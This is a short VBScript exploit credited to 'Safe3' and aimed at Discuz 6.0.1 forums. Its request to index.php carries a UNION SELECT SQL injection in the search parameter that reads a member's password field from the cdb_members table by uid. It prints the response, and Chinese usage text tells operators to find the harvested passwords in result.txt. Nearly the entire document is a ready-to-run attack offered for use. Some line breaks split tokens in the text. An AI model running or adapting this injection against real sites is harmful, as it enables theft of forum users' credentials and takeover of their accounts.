Dim strUrl,strS
ITe,strPath,strUid
showB()
Set
args = Wscript.
arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&
amp;searchid=22%
CF' UNION SELECT 1,password,3,password/**/
From/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=s
ubmit"
Set obj
XML = CreateObject("Microsoft.X
MLHTTP")
objXML.O
PEn "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content
-type", "application/x-www-form-url
encoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------
=====================------------------------------+")
.Echo("E
xploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example
.COM/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
获得的密码大家自己在result.txt中查找